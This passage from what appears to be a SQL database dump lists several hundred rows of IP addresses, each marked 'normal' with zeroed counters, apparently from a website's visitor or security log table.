0,0,0,0,0,'[]'),(2154,'156.146.63.152','normal','',0,0,0,0,0,'[]'),(2155,'174.138.166.210','normal','',0,0,0,0,0,'[]'),(2156,'74.205.112.88','normal','',0,0,0,0,0,'[]'),(2157,'195.211.77.140','normal','',0,0,0,0,0,'[]'),(2158,'82.193.104.168','normal','',0,0,0,0,0,'[]'),(2159,'188.166.147.46','normal','',0,0,0,0,0,'[]'),(2160,'165.22.210.184','normal','',0,0,0,0,0,'[]'),(2161,'194.233.164.177','normal','',0,0,0,0,0,'[]'),(2162,'194.233.164.30','normal','',0,0,0,0,0,'[]'),(2163,'195.74.76.198','normal','',0,0,0,0,0,'[]'),(2164,'91.219.60.108','normal','',0,0,0,0,0,'[]'),(2165,'208.109.39.235','normal','',0,0,0,0,0,'[]'),(2166,'185.36.81.23','normal','',0,0,0,0,0,'[]'),(2167,'35.227.106.69','normal','',0,0,0,0,0,'[]'),(2168,'83.143.116.3','normal','',0,0,0,0,0,'[]'),(2169,'35.162.134.71','normal','',0,0,0,0,0,'[]'),(2170,'66.249.64.159','normal','',0,0,0,0,0,'[]'),(2171,'45.87.240.29','normal','',0,0,0,0,0,'[]'),(2172,'23.229.104.2','normal','',0,0,0,0,0,'[]'),(2173,'97.74.84.167','normal','',0,0,0,0,0,'[]'),(2174,'34.100.229.50','normal','',0,0,0,0,0,'[]'),(2175,'198.98.60.32','normal','',0,0,0,0,0,'[]'),(2176,'94.136.71.71','normal','',0,0,0,0,0,'[]'),(2177,'114.119.149.218','normal','',0,0,0,0,0,'[]'),(2178,'66.249.64.153','normal','',0,0,0,0,0,'[]'),(2179,'54.253.149.44','normal','',0,0,0,0,0,'[]'),(2180,'167.248.133.45','normal','',0,0,0,0,0,'[]'),(2181,'34.138.184.126','normal','',0,0,0,0,0,'[]'),(2182,'95.111.225.89','normal','',0,0,0,0,0,'[]'),(2183,'20.25.109.10','normal','',0,0,0,0,0,'[]'),(2184,'34.139.85.213','normal','',0,0,0,0,0,'[]'),(2185,'2.184.67.138','normal','',0,0,0,0,0,'[]'),(2186,'198.98.49.240','normal','',0,0,0,0,0,'[]'),(2187,'17.121.113.126','normal','',0,0,0,0,0,'[]'),(2188,'195.225.76.130','normal','',0,0,0,0,0,'[]'),(2189,'84.17.58.94','normal','',0,0,0,0,0,'[]'),(2190,'192.150.10.214','normal','',0,0,0,0,0,'[]'),(2191,'93.114.235.167','normal','',0,0,0,0,0,'[]'),(2192,'185.251.90.20','normal','',0,0,0,0,0,'[]'),(2193,'185.255.89.45','normal','',0,0,0,0,0,'[]'),(2194,'107.189.3.40','normal','',0,0,0,0,0,'[]'),(2195,'78.47.152.21','normal','',0,0,0,0,0,'[]'),(2196,'34.74.150.34','normal','',0,0,0,0,0,'[]'),(2197,'145.239.67.10','normal','',0,0,0,0,0,'[]'),(2198,'37.1.223.150','normal','',0,0,0,0,0,'[]'),(2199,'54.36.149.26','normal','',0,0,0,0,0,'[]'),(2200,'54.36.148.135','normal','',0,0,0,0,0,'[]'),(2201,'54.36.148.5','normal','',0,0,0,0,0,'[]'),(2202,'54.36.148.78','normal','',0,0,0,0,0,'[]'),(2203,'54.36.149.14','normal','',0,0,0,0,0,'[]'),(2204,'54.36.148.141','normal','',0,0,0,0,0,'[]'),(2205,'54.36.148.233','normal','',0,0,0,0,0,'[]'),(2206,'85.114.134.71','normal','',0,0,0,0,0,'[]'),(2207,'54.36.149.103','normal','',0,0,0,0,0,'[]'),(2208,'192.150.10.213','normal','',0,0,0,0,0,'[]'),(2209,'45.115.39.18','normal','',0,0,0,0,0,'[]'),(2210,'188.68.47.238','normal','',0,0,0,0,0,'[]'),(2211,'34.152.1.73','normal','',0,0,0,0,0,'[]'),(2212,'34.74.188.151','normal','',0,0,0,0,0,'[]'),(2213,'42.194.235.210','normal','',0,0,0,0,0,'[]'),(2214,'159.65.24.22','normal','',0,0,0,0,0,'[]'),(2215,'20.171.59.197','normal','',0,0,0,0,0,'[]'),(2216,'114.119.128.154','normal','',0,0,0,0,0,'[]'),(2217,'54.36.148.45','normal','',0,0,0,0,0,'[]'),(2218,'50.87.144.165','normal','',0,0,0,0,0,'[]'),(2219,'67.170.42.92','normal','',0,0,0,0,0,'[]'),(2220,'109.168.97.89','normal','',0,0,0,0,0,'[]'),(2221,'151.80.24.73','normal','',0,0,0,0,0,'[]'),(2222,'151.106.117.15','normal','',0,0,0,0,0,'[]'),(2223,'192.185.176.213','normal','',0,0,0,0,0,'[]'),(2224,'142.44.142.193','normal','',0,0,0,0,0,'[]'),(2225,'51.38.38.73','normal','',0,0,0,0,0,'[]'),(2226,'167.71.63.47','normal','',0,0,0,0,0,'[]'),(2227,'190.92.137.177','normal','',0,0,0,0,0,'[]'),(2228,'192.169.177.64','normal','',0,0,0,0,0,'[]'),(2229,'46.101.117.50','normal','',0,0,0,0,0,'[]'),(2230,'103.81.84.24','normal','',0,0,0,0,0,'[]'),(2231,'194.42.98.32','normal','',0,0,0,0,0,'[]'),(2232,'114.119.135.83','normal','',0,0,0,0,0,'[]'),(2233,'158.69.171.153','normal','',0,0,0,0,0,'[]'),(2234,'167.172.173.146','normal','',0,0,0,0,0,'[]'),(2235,'106.53.124.110','normal','',0,0,0,0,0,'[]'),(2236,'156.146.63.151','normal','',0,0,0,0,0,'[]'),(2237,'208.113.149.124','normal','',0,0,0,0,0,'[]'),(2238,'104.45.41.45','normal','',0,0,0,0,0,'[]'),(2239,'104.248.131.36','normal','',0,0,0,0,0,'[]'),(2240,'82.180.153.58','normal','',0,0,0,0,0,'[]'),(2241,'52.8.178.73','normal','',0,0,0,0,0,'[]'),(2242,'188.153.0.191','normal','',0,0,0,0,0,'[]'),(2243,'54.36.110.109','normal','',0,0,0,0,0,'[]'),(2244,'51.159.108.231','normal','',0,0,0,0,0,'[]'),(2245,'178.208.67.42','normal','',0,0,0,0,0,'[]'),(2246,'178.250.156.94','normal','',0,0,0,0,0,'[]'),(2247,'198.27.118.0','normal','',0,0,0,0,0,'[]'),(2248,'148.72.214.194','normal','',0,0,0,0,0,'[]'),(2249,'40.77.167.101','normal','',0,0,0,0,0,'[]'),(2250,'116.203.235.83','normal','',0,0,0,0,0,'[]'),(2251,'23.250.41.212','normal','',0,0,0,0,0,'[]'),(2252,'144.168.229.191','normal','',0,0,0,0,0,'[]'),(2253,'135.181.212.177','normal','',0,0,0,0,0,'[]'),(2254,'44.203.249.213','normal','',0,0,0,0,0,'[]'),(2255,'103.130.218.42','normal','',0,0,0,0,0,'[]'),(2256,'217.182.142.186','normal','',0,0,0,0,0,'[]'),(2257,'194.62.52.70','normal','',0,0,0,0,0,'[]'),(2258,'192.99.36.61','normal','',0,0,0,0,0,'[]'),(2259,'5.45.207.87','normal','',0,0,0,0,0,'[]'),(2260,'51.255.62.14','normal','',0,0,0,0,0,'[]'),(2261,'51.255.62.3','normal','',0,0,0,0,0,'[]'),(2262,'51.255.62.4','normal','',0,0,0,0,0,'[]'),(2263,'34.73.42.176','normal','',0,0,0,0,0,'[]'),(2264,'51.255.62.15','normal','',0,0,0,0,0,'[]'),(2265,'51.255.62.5','normal','',0,0,0,0,0,'[]'),(2266,'51.255.62.9','normal','',0,0,0,0,0,'[]'),(2267,'52.151.92.118','normal','',0,0,0,0,0,'[]'),(2268,'84.17.55.115','normal','',0,0,0,0,0,'[]'),(2269,'193.148.16.246','normal','',0,0,0,0,0,'[]'),(2270,'76.72.175.112','normal','',0,0,0,0,0,'[]'),(2271,'68.235.38.149','normal','',0,0,0,0,0,'[]'),(2272,'188.165.87.96','normal','',0,0,0,0,0,'[]'),(2273,'114.119.137.7','normal','',0,0,0,0,0,'[]'),(2274,'188.165.87.97','normal','',0,0,0,0,0,'[]'),(2275,'51.254.49.111','normal','',0,0,0,0,0,'[]'),(2276,'51.254.49.105','normal','',0,0,0,0,0,'[]'),(2277,'51.254.49.102','normal','',0,0,0,0,0,'[]'),(2278,'20.172.39.79','normal','',0,0,0,0,0,'[]'),(2279,'82.70.84.122','normal','',0,0,0,0,0,'[]'),(2280,'148.72.211.177','normal','',0,0,0,0,0,'[]'),(2281,'45.85.146.176','normal','',0,0,0,0,0,'[]'),(2282,'194.233.69.10','normal','',0,0,0,0,0,'[]'),(2283,'5.255.231.135','normal','',0,0,0,0,0,'[]'),(2284,'91.224.23.111','normal','',0,0,0,0,0,'[]'),(2285,'20.171.104.236','normal','',0,0,0,0,0,'[]'),(2286,'23.175.146.178','normal','',0,0,0,0,0,'[]'),(2287,'5.9.98.130','normal','',0,0,0,0,0,'[]'),(2288,'172.104.161.26','normal','',0,0,0,0,0,'[]'),(2289,'114.119.147.73','normal','',0,0,0,0,0,'[]'),(2290,'185.197.160.14','normal','',0,0,0,0,0,'[]'),(2291,'54.36.149.10','normal','',0,0,0,0,0,'[]'),(2292,'108.179.192.195','normal','',0,0,0,0,0,'[]'),(2293,'108.167.189.66','normal','',0,0,0,0,0,'[]'),(2294,'192.115.100.180','normal','',0,0,0,0,0,'[]'),(2295,'94.156.175.192','normal','',0,0,0,0,0,'[]'),(2296,'35.185.26.250','normal','',0,0,0,0,0,'[]'),(2297,'128.199.60.194','normal','',0,0,0,0,0,'[]'),(2298,'178.128.219.45','normal','',0,0,0,0,0,'[]'),(2299,'74.208.253.62','normal','',0,0,0,0,0,'[]'),(2300,'136.243.77.239','normal','',0,0,0,0,0,'[]'),(2301,'157.245.166.98','normal','',0,0,0,0,0,'[]'),(2302,'159.223.231.91','normal','',0,0,0,0,0,'[]'),(2303,'116.68.196.90','normal','',0,0,0,0,0,'[]'),(2304,'210.211.113.136','normal','',0,0,0,0,0,'[]'),(2305,'103.133.214.139','normal','',0,0,0,0,0,'[]'),(2306,'188.127.239.132','normal','',0,0,0,0,0,'[]'),(2307,'188.127.239.132','normal','',0,0,0,0,0,'[]'),(2308,'194.5.175.223','normal','',0,0,0,0,0,'[]'),(2309,'157.230.26.13','normal','',0,0,0,0,0,'[]'),(2310,'38.242.214.236','normal','',0,0,0,0,0,'[]'),(2311,'199.188.207.230','normal','',0,0,0,0,0,'[]'),(2312,'192.169.232.249','normal','',0,0,0,0,0,'[]'),(2313,'51.159.57.26','normal','',0,0,0,0,0,'[]'),(2314,'35.196.67.52','normal','',0,0,0,0,0,'[]'),(2315,'114.119.138.188','normal','',0,0,0,0,0,'[]'),(2316,'195.191.219.131','normal','',0,0,0,0,0,'[]'),(2317,'186.234.80.143','normal','',0,0,0,0,0,'[]'),(2318,'50.87.144.26','normal','',0,0,0,0,0,'[]'),(2319,'194.150.215.251','normal','',0,0,0,0,0,'[]'),(2320,'69.195.105.215','normal','',0,0,0,0,0,'[]'),(2321,'108.167.189.32','normal','',0,0,0,0,0,'[]'),(2322,'51.144.238.41','normal','',0,0,0,0,0,'[]'),(2323,'195.206.105.227','normal','',0,0,0,0,0,'[]'),(2324,'104.254.90.203','normal','',0,0,0,0,0,'[]'),(2325,'199.249.230.17','normal','',0,0,0,0,0,'[]'),(2326,'103.8.26.65','normal','',0,0,0,0,0,'[]'),(2327,'92.119.178.3','normal','',0,0,0,0,0,'[]'),(2328,'43.133.55.86','normal','',0,0,0,0,0,'[]'),(2329,'167.99.54.31','normal','',0,0,0,0,0,'[]'),(2330,'88.99.133.202','normal','',0,0,0,0,0,'[]'),(2331,'95.217.179.54','normal','',0,0,0,0,0,'[]'),(2332,'213.152.161.85','normal','',0,0,0,0,0,'[]'),(2333,'80.120.129.210','normal','',0,0,0,0,0,'[]'),(2334,'193.118.55.146','normal','',0,0,0,0,0,'[]'),(2335,'114.119.142.72','normal','',0,0,0,0,0,'[]'),(2336,'5.188.62.26','normal','',0,0,0,0,0,'[]'),(2337,'124.106.71.219','normal','',0,0,0,0,0,'[]'),(2338,'109.248.148.195','normal','',0,0,0,0,0,'[]'),(2339,'35.196.95.211','normal','',0,0,0,0,0,'[]'),(2340,'213.152.187.215','normal','',0,0,0,0,0,'[]'),(2341,'185.206.225.51','normal','',0,0,0,0,0,'[]'),(2342,'62.102.148.185','normal','',0,0,0,0,0,'[]'),(2343,'145.239.233.113','normal','',0,0,0,0,0,'[]'),(2344,'40.117.85.187','normal','',0,0,0,0,0,'[]'),(2345,'185.156.175.51','normal','',0,0,0,0,0,'[]'),(2346,'46.183.217.11','normal','',0,0,0,0,0,'[]'),(2347,'34.76.136.252','normal','',0,0,0,0,0,'[]'),(2348,'35.210.213.154','normal','',0,0,0,0,0,'[]'),(2349,'35.210.133.198','normal','',0,0,0,0,0,'[]'),(2350,'40.77.188.135','normal','',0,0,0,0,0,'[]'),(2351,'37.120.210.211','normal','',0,0,0,0,0,'[]'),(2352,'184.75.221.211','normal','',0,0,0,0,0,'[]'),(2353,'93.159.230.88','normal','',0,0,0,0,0,'[]'),(2354,'34.136.55.195','normal','',0,0,0,0,0,'[]'),(2355,'128.127.104.80','normal','',0,0,0,0,0,'[]'),(2356,'67.205.162.195','normal','',0,0,0,0,0,'[]'),(2357,'52.89.34.50','normal','',0,0,0,0,0,'[]'),(2358,'34.221.123.215','normal','',0,0,0,0,0,'[]'),(2359,'35.210.99.239','normal','',0,0,0,0,0,'[]'),(2360,'8.218.9.52','normal','',0,0,0,0,0,'[]'),(2361,'8.218.9.52','normal','',0,0,0,0,0,'[]'),(2362,'144.126.140.17','normal','',0,0,0,0,0,'[]'),(2363,'120.79.202.203','normal','',0,0,0,0,0,'[]'),(2364,'120.79.202.203','normal','',0,0,0,0,0,'[]'),(2365,'20.194.163.134','normal','',0,0,0,0,0,'[]'),(2366,'109.237.138.15','normal','',0,0,0,0,0,'[]'),(2367,'207.46.13.42','normal','',0,0,0,0,0,'[]'),(2368,'156.146.63.136','normal','',0,0,0,0,0,'[]'),(2369,'198.57.247.174','normal','',0,0,0,0,0,'[]'),(2370,'142.132.230.128','normal','',0,0,0,0,0,'[]'),(2371,'34.68.97.70','normal','',0,0,0,0,0,'[]'),(2372,'46.183.216.163','normal','',0,0,0,0,0,'[]'),(2373,'163.172.110.175','normal','',0,0,0,0,0,'[]'),(2374,'34.139.163.247','normal','',0,0,0,0,0,'[]'),(2375,'209.205.211.242','normal','',0,0,0,0,0,'[]'),(2376,'185.200.116.211','normal','',0,0,0,0,0,'[]'),(2377,'116.203.120.218','normal','',0,0,0,0,0,'[]'),(2378,'116.203.120.218','normal','',0,0,0,0,0,'[]'),(2379,'44.199.209.36','normal','',0,0,0,0,0,'[]'),(2380,'35.192.18.191','normal','',0,0,0,0,0,'[]'),(2381,'173.254.28.204','normal','',0,0,0,0,0,'[]'),(2382,'200.147.58.31','normal','',0,0,0,0,0,'[]'),(2383,'50.87.230.228','normal','',0,0,0,0,0,'[]'),(2384,'54.172.114.74','normal','',0,0,0,0,0,'[]'),(2385,'114.119.136.12','normal','',0,0,0,0,0,'[]'),(2386,'23.227.72.171','normal','',0,0,0,0,0,'[]'),(2387,'34.121.199.245','normal','',0,0,0,0,0,'[]'),(2388,'107.178.218.141','normal','',0,0,0,0,0,'[]'),(2389,'3.92.27.170','normal','',0,0,0,0,0,'[]'),(2390,'20.249.216.158','normal','',0,0,0,0,0,'[]'),(2391,'183.136.225.44','normal','',0,0,0,0,0,'[]'),(2392,'57.128.45.42','normal','',0,0,0,0,0,'[]'),(2393,'199.249.223.130','normal','',0,0,0,0,0,'[]'),(2394,'44.198.61.251','normal','',0,0,0,0,0,'[]'),(2395,'35.237.36.3','normal','',0,0,0,0,0,'[]'),(2396,'141.98.102.179','normal','',0,0,0,0,0,'[]'),(2397,'185.196.53.18','normal','',0,0,0,0,0,'[]'),(2398,'54.152.25.245','normal','',0,0,0,0,0,'[]'),(2399,'184.75.214.163','normal','',0,0,0,0,0,'[]'),(2400,'68.235.35.124','normal','',0,0,0,0,0,'[]'),(2401,'5.45.207.71','normal','',0,0,0,0,0,'[]'),(2402,'184.75.223.227','normal','',0,0,0,0,0,'[]'),(2403,'3.84.1.237','normal','',0,0,0,0,0,'[]'),(2404,'185.195.237.203','normal','',0,0,0,0,0,'[]'),(2405,'50.54.130.20','normal','',0,0,0,0,0,'[]'),(2406,'114.119.154.229','normal','',0,0,0,0,0,'[]'),(2407,'74.208.210.106','normal','',0,0,0,0,0,'[]'),(2408,'40.122.209.133','normal','',0,0,0,0,0,'[]'),(2409,'213.152.161.101','normal','',0,0,0,0,0,'[]'),(2410,'64.246.187.42','normal','',0,0,0,0,0,'[]'),(2411,'34.134.168.225','normal','',0,0,0,0,0,'[]'),(2412,'119.8.229.155','normal','',0,0,0,0,0,'[]'),(2413,'89.32.46.187','normal','',0,0,0,0,0,'[]'),(2414,'77.68.15.224','normal','',0,0,0,0,0,'[]'),(2415,'35.210.62.152','normal','',0,0,0,0,0,'[]'),(2416,'52.144.59.199','normal','',0,0,0,0,0,'[]'),(2417,'89.249.74.218','normal','',0,0,0,0,0,'[]'),(2418,'18.236.92.26','normal','',0,0,0,0,0,'[]'),(2419,'35.92.70.25','normal','',0,0,0,0,0,'[]'),(2420,'35.90.136.182','normal','',0,0,0,0,0,'[]'),(2421,'18.237.94.4','normal','',0,0,0,0,0,'[]'),(2422,'35.92.121.116','normal','',0,0,0,0,0,'[]'),(2423,'213.152.162.165','normal','',0,0,0,0,0,'[]'),(2424,'161.35.127.186','normal','',0,0,0,0,0,'[]'),(2425,'5.101.157.214','normal','',0,0,0,0,0,'[]'),(2426,'65.21.206.43','normal','',0,0,0,0,0,'[]'),(2427,'34.73.221.42','normal','',0,0,0,0,0,'[]'),(2428,'153.92.7.33','normal','',0,0,0,0,0,'[]'),(2429,'87.249.38.253','normal','',0,0,0,0,0,'[]'),(2430,'5.101.157.247','normal','',0,0,0,0,0,'[]'),(2431,'213.152.162.79','normal','',0,0,0,0,0,'[]'),(2432,'20.188.46.234','normal','',0,0,0,0,0,'[]'),(2433,'34.133.102.249','normal','',0,0,0,0,0,'[]'),(2434,'95.85.33.41','normal','',0,0,0,0,0,'[]'),(2435,'104.254.90.187','normal','',0,0,0,0,0,'[]'),(2436,'14.116.220.93','normal','',0,0,0,0,0,'[]'),(2437,'20.85.122.23','normal','',0,0,0,0,0,'[]'),(2438,'185.206.225.59','normal','',0,0,0,0,0,'[]'),(2439,'88.214.25.5','normal','',0,0,0,0,0,'[]'),(2440,'124.222.127.109','normal','',0,0,0,0,0,'[]'),(2441,'34.79.114.255','normal','',0,0,0,0,0,'[]'),(2442,'114.119.149.43','normal','',0,0,0,0,0,'[]'),(2443,'199.244.88.229','normal','',0,0,0,0,0,'[]'),(2444,'199.244.88.225','normal','',0,0,0,0,0,'[]'),(2445,'80.87.206.247','normal','',0,0,0,0,0,'[]'),(2446,'80.87.206.219','normal','',0,0,0,0,0,'[]'),(2447,'34.67.171.181','normal','',0,0,0,0,0,'[]'),(2448,'5.101.157.188','normal','',0,0,0,0,0,'[]'),(2449,'185.12.109.223','normal','',0,0,0,0,0,'[]'),(2450,'146.70.76.35','normal','',0,0,0,0,0,'[]'),(2451,'61.77.32.97','normal','',0,0,0,0,0,'[]'),(2452,'34.203.77.218','normal','',0,0,0,0,0,'[]'),(2453,'209.141.56.13','normal','',0,0,0,0,0,'[]'),(2454,'203.75.213.3','normal','',0,0,0,0,0,'[]'),(2455,'178.33.114.104','normal','',0,0,0,0,0,'[]'),(2456,'213.152.162.99','normal','',0,0,0,0,0,'[]'),(2457,'34.75.213.63','normal','',0,0,0,0,0,'[]'),(2458,'213.152.162.94','normal','',0,0,0,0,0,'[]'),(2459,'20.125.124.123','normal','',0,0,0,0,0,'[]'),(2460,'107.167.244.67','normal','',0,0,0,0,0,'[]'),(2461,'114.119.136.30','normal','',0,0,0,0,0,'[]'),(2462,'213.152.187.205','normal','',0,0,0,0,0,'[]'),(2463,'193.228.74.250','normal','',0,0,0,0,0,'[]'),(2464,'58.97.249.29','normal','',0,0,0,0,0,'[]'),(2465,'207.46.13.45','normal','',0,0,0,0,0,'[]'),(2466,'83.229.106.148','normal','',0,0,0,0,0,'[]'),(2467,'152.39.205.53','normal','',0,0,0,0,0,'[]'),(2468,'103.133.133.193','normal','',0,0,0,0,0,'[]'),(2469,'181.177.111.64','normal','',0,0,0,0,0,'[]'),(2470,'104.254.90.251','normal','',0,0,0,0,0,'[]'),(2471,'95.91.111.111','normal','',0,0,0,0,0,'[]'),(2472,'34.148.11.126','normal','',0,0,0,0,0,'[]'),(2473,'35.206.148.41','normal','',0,0,0,0,0,'[]'),(2474,'213.152.186.19','normal','',0,0,0,0,0,'[]'),(2475,'37.120.217.243','normal','',0,0,0,0,0,'[]'),(2476,'202.181.22.152','normal','',0,0,0,0,0,'[]'),(2477,'199.249.230.37','normal','',0,0,0,0,0,'[]'),(2478,'213.152.161.30','normal','',0,0,0,0,0,'[]'),(2479,'213.152.187.225','normal','',0,0,0,0,0,'[]'),(2480,'20.163.100.57','normal','',0,0,0,0,0,'[]'),(2481,'34.229.151.141','normal','',0,0,0,0,0,'[]'),(2482,'87.250.224.18','normal','',0,0,0,0,0,'[]'),(2483,'185.27.99.122','normal','',0,0,0,0,0,'[]'),(2484,'185.27.99.121','normal','',0,0,0,0,0,'[]'),(2485,'185.27.99.132','normal','',0,0,0,0,0,'[]'),(2486,'185.27.99.143','normal','',0,0,0,0,0,'[]'),(2487,'185.27.99.112','normal','',0,0,0,0,0,'[]'),(2488,'34.228.11.136','normal','',0,0,0,0,0,'[]'),(2489,'35.227.119.166','normal','',0,0,0,0,0,'[]'),(2490,'213.152.187.220','normal','',0,0,0,0,0,'[]'),(2491,'174.211.39.191','normal','',0,0,0,0,0,'[]'),(2492,'174.211.39.191','normal','',0,0,0,0,0,'[]'),(2493,'15.235.12.96','normal','',0,0,0,0,0,'[]'),(2494,'193.37.254.11','normal','',0,0,0,0,0,'[]'),(2495,'66.249.68.63','normal','',0,0,0,0,0,'[]'),(2496,'62.102.148.158','normal','',0,0,0,0,0,'[]'),(2497,'205.185.116.162','normal','',0,0,0,0,0,'[]'),(2498,'34.204.171.152','normal','',0,0,0,0,0,'[]'),(2499,'154.16.169.237','normal','',0,0,0,0,0,'[]'),(2500,'40.77.167.100','normal','',0,0,0,0,0,'[]'),(2501,'45.43.19.77','normal','',0,0,0,0,0,'[]'),(2502,'52.23.196.169','normal','',0,0,0,0,0,'[]'),(2503,'114.119.150.155','normal','',0,0,0,0,0,'[]'),(2504,'195.191.219.133','normal','',0,0,0,0,0,'[]'),(2505,'213.152.162.154','normal','',0,0,0,0,0,'[]'),(2506,'178.162.204.214','normal','',0,0,0,0,0,'[]'),(2507,'34.73.24.87','normal','',0,0,0,0,0,'[]'),(2508,'114.119.129.218','normal','',0,0,0,0,0,'[]'),(2509,'35.227.114.12','normal','',0,0,0,0,0,'[]'),(2510,'20.168.36.92','normal','',0,0,0,0,0,'[]'),(2511,'20.168.36.92','normal','',0,0,0,0,0,'[]'),(2512,'137.63.71.51','normal','',0,0,0,0,0,'[]'),(2513,'31.3.152.100','normal','',0,0,0,0,0,'[]'),(2514,'156.146.63.150','normal','',0,0,0,0,0,'[]'),(2515,'35.225.87.87','normal','',0,0,0,0,0,'[]'),(2516,'91.220.179.155','normal','',0,0,0,0,0,'[]'),(2517,'23.227.176.12','normal','',0,0,0,0,0,'[]'),(2518,'51.254.47.220','normal','',0,0,0,0,0,'[]'),(2519,'212.53.215.209','normal','',0,0,0,0,0,'[]'),(2520,'157.245.71.145','normal','',0,0,0,0,0,'[]'),(2521,'182.92.161.135','normal','',0,0,0,0,0,'[]'),(2522,'64.42.179.43','normal','',0,0,0,0,0,'[]'),(2523,'119.18.54.14','normal','',0,0,0,0,0,'[]'),(2524,'37.120.210.219','normal','',0,0,0,0,0,'[]'),(2525,'162.241.120.248','normal','',0,0,0,0,0,'[]'),(2526,'209.141.46.253','normal','',0,0,0,0,0,'[]'),(2527,'207.46.13.63','normal','',0,0,0,0,0,'[]'),(2528,'128.199.108.205','normal','',0,0,0,0,0,'[]'),(2529,'149.102.137.9','normal','',0,0,0,0,0,'[]'),(2530,'93.186.115.226','normal','',0,0,0,0,0,'[]'),(2531,'107.167.244.83','normal','',0,0,0,0,0,'[]'),(2532,'153.92.4.20','normal','',0,0,0,0,0,'[]'),(2533,'162.14.71.142','normal','',0,0,0,0,0,'[]'),(2534,'54.36.148.215','normal','',0,0,0,0,0,'[]'),(2535,'54.36.148.235','normal','',0,0,0,0,0,'[]'),(2536,'54.36.148.113','normal','',0,0,0,0,0,'[]'),(2537,'212.1.211.12','normal','',0,0,0,0,0,'[]'),(2538,'54.36.148.140','normal','',0,0,0,0,0,'[]'),(2539,'54.36.148.234','normal','',0,0,0,0,0,'[]'),(2540,'54.36.148.161','normal','',0,0,0,0,0,'[]'),(2541,'185.180.143.142','normal','',0,0,0,0,0,'[]'),(2542,'45.77.125.145','normal','',0,0,0,0,0,'[]'),(2543,'94.237.65.250','normal','',0,0,0,0,0,'[]'),(2544,'162.144.59.224','normal','',0,0,0,0,0,'[]'),(2545,'168.119.2.80','normal','',0,0,0,0,0,'[]'),(2546,'185.69.154.241','normal','',0,0,0,0,0,'[]'),(2547,'216.70.93.152','normal','',0,0,0,0,0,'[]'),(2548,'216.70.93.152','normal','',0,0,0,0,0,'[]'),(2549,'23.111.152.238','normal','',0,0,0,0,0,'[]'),(2550,'54.36.149.40','normal','',0,0,0,0,0,'[]'),(2551,'65.21.248.218','normal','',0,0,0,0,0,'[]'),(2552,'34.139.20.103','normal','',0,0,0,0,0,'[]'),(2553,'45.137.66.199','normal','',0,0,0,0,0,'[]'),(2554,'45.137.66.199','normal','',0,0,0,0,0,'[]'),(2555,'93.125.114.121','normal','',0,0,0,0,0,'[]'),(2556,'62.102.148.156','normal','',0,0,0,0,0,'[]'),(2557,'46.101.202.174','normal','',0,0,0,0,0,'[]'),(2558,'114.119.162.33','normal','',0,0,0,0,0,'[]'),(2559,'185.191.171.2','normal','',0,0,0,0,0,'[]'),(2560,'185.191.171.36','normal','',0,0,0,0,0,'[]'),(2561,'185.156.175.35','normal','',0,0,0,0,0,'[]'),(2562,'54.36.148.37','normal','',0,0,0,0,0,'[]'),(2563,'54.36.149.25','normal','',0,0,0,0,0,'[]'),(2564,'54.36.148.75','normal','',0,0,0,0,0,'[]'),(2565,'54.36.148.86','normal','',0,0,0,0,0,'[]'),(2566,'54.36.149.87','normal','',0,0,0,0,0,'[]'),(2567,'192.109.205.138','normal','',0,0,0,0,0,'[]'),(2568,'192.249.115.227','normal','',0,0,0,0,0,'[]'),(2569,'193.235.141.171','normal','',0,0,0,0,0,'[]'),(2570,'178.62.110.145','normal','',0,0,0,0,0,'[]'),(2571,'73.110.116.83','normal','',0,0,0,0,0,'[]'),(2572,'66.249.79.187','normal','',0,0,0,0,0,'[]'),(2573,'66.249.79.191','normal','',0,0,0,0,0,'[]'),(2574,'66.249.79.189','normal','',0,0,0,0,0,'[]'),(2575,'213.152.162.181','normal','',0,0,0,0,0,'[]'),(2576,'114.119.141.51','normal','',0,0,0,0,0,'[]'),(2577,'14.29.246.47','normal','',0,0,0,0,0,'[]'),(2578,'149.28.159.208','normal','',0,0,0,0,0,'[]'),(2579,'43.225.100.101','normal','',0,0,0,0,0,'[]'),(2580,'8.142.80.20','normal','',0,0,0,0,0,'[]'),(2581,'198.98.51.74','normal','',0,0,0,0,0,'[]'),(2582,'135.181.60.103','normal','',0,0,0,0,0,'[]'),(2583,'156.146.63.159','normal','',0,0,0,0,0,'[]'),(2584,'103.7.8.169','normal','',0,0,0,0,0,'[]'),(2585,'34.75.191.234','normal','',0,0,0,0,0,'[]'),(2586,'142.93.171.58','normal','',0,0,0,0,0,'[]'),(2587,'110.40.133.236','normal','',0,0,0,0,0,'[]'),(2588,'213.142.156.234','normal','',0,0,0,0,0,'[]'),(2589,'54.36.148.31','normal','',0,0,0,0,0,'[]'),(2590,'54.36.148.47','normal','',0,0,0,0,0,'[]'),(2591,'45.155.165.220','normal','',0,0,0,0,0,'[]'),(2592,'192.185.82.92','normal','',0,0,0,0,0,'[]'),(2593,'129.153.25.174','normal','',0,0,0,0,0,'[]'),(2594,'129.158.253.200','normal','',0,0,0,0,0,'[]'),(2595,'103.179.87.147','normal','',0,0,0,0,0,'[]'),(2596,'130.44.212.116','normal','',0,0,0,0,0,'[]'),(2597,'130.44.212.107','normal','',0,0,0,0,0,'[]'),(2598,'147.182.150.188','normal','',0,0,0,0,0,'[]'),(2599,'140.246.136.252','normal','',0,0,0,0,0,'[]'),(2600,'51.79.30.143','normal','',0,0,0,0,0,'[]'),(2601,'35.190.204.246','normal','',0,0,0,0,0,'[]'),(2602,'112.213.89.124','normal','',0,0,0,0,0,'[]'),(2603,'14.29.200.97','normal','',0,0,0,0,0,'[]'),(2604,'161.35.205.6','normal','',0,0,0,0,0,'[]'),(2605,'113.217.254.42','normal','',0,0,0,0,0,'[]'),(2606,'161.97.172.18','normal','',0,0,0,0,0,'[]'),(2607,'184.75.223.219','normal','',0,0,0,0,0,'[]'),(2608,'185.22.64.96','normal','',0,0,0,0,0,'[]'),(2609,'104.41.221.5','normal','',0,0,0,0,0,'[]'),(2610,'193.36.225.123','normal','',0,0,0,0,0,'[]'),(2611,'5.45.207.106','normal','',0,0,0,0,0,'[]'),(2612,'95.108.213.52','normal','',0,0,0,0,0,'[]'),(2613,'185.93.182.171','normal','',0,0,0,0,0,'[]'),(2614,'91.238.165.67','normal','',0,0,0,0,0,'[]'),(2615,'213.152.161.165','normal','',0,0,0,0,0,'[]'),(2616,'177.222.54.214','normal','',0,0,0,0,0,'[]'),(2617,'209.126.7.173','normal','',0,0,0,0,0,'[]'),(2618,'209.126.7.173','normal','',0,0,0,0,0,'[]'),(2619,'35.196.182.218','normal','',0,0,0,0,0,'[]'),(2620,'45.252.251.8','normal','',0,0,0,0,0,'[]'),(2621,'67.227.251.154','normal','',0,0,0,0,0,'[]'),(2622,'17.121.